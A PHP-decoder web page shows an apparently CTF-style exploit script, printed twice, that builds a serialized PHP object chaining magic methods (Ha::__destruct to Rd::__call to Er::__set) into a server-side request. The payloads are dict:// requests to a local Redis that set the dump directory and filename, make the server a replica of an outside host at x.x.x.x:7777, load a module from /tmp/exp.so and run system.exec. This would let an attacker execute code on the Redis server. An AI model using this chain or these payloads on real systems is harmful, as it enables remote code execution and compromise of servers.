Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php class Rd { public $ending; public $cl; public $poc; public ..

Decoded Output download

<?php  
class Rd 
{ 
    public $ending; 
    public $cl; 
    public $poc; 
 
    public function __destruct(){ 
        // echo "All matters have concluded"."</br>"; 
    } 
 
    public function __call($name, $arg){ 
        foreach ($arg as $key => $value) { 
            if ($arg[0]['POC'] == "0.o") { 
                $this->cl->var1 = "get"; 
            } 
        } 
    } 
} 
 
class Poc 
{ 
    public $payload; 
    public $fun; 
 
    public function __set($name, $value){ 
        $this->payload = $name; 
        $this->fun = $value; 
    } 
 
    function getflag($paylaod){ 
        echo "Have you genuinely accomplished what you set out to do?"."</br>"; 
        file_get_contents($paylaod); 
    } 
} 
 
class Er 
{ 
    public $symbol; 
    public $Flag; 
 
    public function __construct(){ 
        $this->symbol = True; 
    } 
 
    public function __set($name, $value){    
        if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',base64_decode($this->Flag))){ 
               $value($this->Flag); 
        } 
    else { 
    echo "NoNoNo,please you can look hint.php"."</br>"; 
    } 
  } 
} 
 
class Ha 
{ 
    public $start; 
    public $start1; 
    public $start2; 
 
    public function __construct(){ 
        // echo $this->start1 . "__construct" . "</br>"; 
    } 
 
    public function __destruct(){ 
        if ($this->start2 === "o.0") { 
            $this->start1->Love($this->start); 
            // echo "You are Good!"."</br>"; 
        } 
    } 
} 
 
function get($url) { 
    // $url=base64_decode($url); 
    // var_dump($url); 
    // $ch = curl_init(); 
    // curl_setopt($ch, CURLOPT_URL, $url); 
    // curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    // curl_setopt($ch, CURLOPT_HEADER, 0); 
    // $output = curl_exec($ch); 
    // $result_info = curl_getinfo($ch); 
    // var_dump($result_info); 
    // curl_close($ch); 
    // var_dump($output); 
} 
 
// Ha::__destruct() -> Rd::__call() -> Er::__set() -> get() 
 
// payload evil redis-server 
// $payload = "dict://127.0.0.1:6379/config:set:dir:/tmp"; 
// $payload = "dict://127.0.0.1:6379/config:set:dbfilename:exp.so"; 
// $payload = "dict://127.0.0.1:6379/slaveof:x.x.x.x:7777"; 
// $payload = "dict://127.0.0.1:6379/module:load:/tmp/exp.so"; 
// $payload = "dict://127.0.0.1:6379/slave:no:one"; 
$payload = "dict://127.0.0.1:6379/system.exec:env"; 
$Er = new Er(); 
$Er -> Flag = base64_encode($payload); 
$Rd = new Rd(); 
$Rd -> cl = $Er; 
$Ha = new Ha(); 
$Ha -> start = ['POC'=>'0.o']; 
$Ha -> start1 = $Rd; 
$Ha -> start2 = 'o.0'; 
 
echo(serialize($Ha)); 
 ?>

Did this file decode correctly?

Original Code

<?php 
class Rd
{
    public $ending;
    public $cl;
    public $poc;

    public function __destruct(){
        // echo "All matters have concluded"."</br>";
    }

    public function __call($name, $arg){
        foreach ($arg as $key => $value) {
            if ($arg[0]['POC'] == "0.o") {
                $this->cl->var1 = "get";
            }
        }
    }
}

class Poc
{
    public $payload;
    public $fun;

    public function __set($name, $value){
        $this->payload = $name;
        $this->fun = $value;
    }

    function getflag($paylaod){
        echo "Have you genuinely accomplished what you set out to do?"."</br>";
        file_get_contents($paylaod);
    }
}

class Er
{
    public $symbol;
    public $Flag;

    public function __construct(){
        $this->symbol = True;
    }

    public function __set($name, $value){   
        if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',base64_decode($this->Flag))){
               $value($this->Flag);
        }
    else {
    echo "NoNoNo,please you can look hint.php"."</br>";
    }
  }
}

class Ha
{
    public $start;
    public $start1;
    public $start2;

    public function __construct(){
        // echo $this->start1 . "__construct" . "</br>";
    }

    public function __destruct(){
        if ($this->start2 === "o.0") {
            $this->start1->Love($this->start);
            // echo "You are Good!"."</br>";
        }
    }
}

function get($url) {
    // $url=base64_decode($url);
    // var_dump($url);
    // $ch = curl_init();
    // curl_setopt($ch, CURLOPT_URL, $url);
    // curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // curl_setopt($ch, CURLOPT_HEADER, 0);
    // $output = curl_exec($ch);
    // $result_info = curl_getinfo($ch);
    // var_dump($result_info);
    // curl_close($ch);
    // var_dump($output);
}

// Ha::__destruct() -> Rd::__call() -> Er::__set() -> get()

// payload evil redis-server
// $payload = "dict://127.0.0.1:6379/config:set:dir:/tmp";
// $payload = "dict://127.0.0.1:6379/config:set:dbfilename:exp.so";
// $payload = "dict://127.0.0.1:6379/slaveof:x.x.x.x:7777";
// $payload = "dict://127.0.0.1:6379/module:load:/tmp/exp.so";
// $payload = "dict://127.0.0.1:6379/slave:no:one";
$payload = "dict://127.0.0.1:6379/system.exec:env";
$Er = new Er();
$Er -> Flag = base64_encode($payload);
$Rd = new Rd();
$Rd -> cl = $Er;
$Ha = new Ha();
$Ha -> start = ['POC'=>'0.o'];
$Ha -> start1 = $Rd;
$Ha -> start2 = 'o.0';

echo(serialize($Ha));
 ?>

Function Calls

None

Variables

None

Stats

MD5	7ca722377884dd1a884d095001f2765b
Eval Count	0
Decode Time	68 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats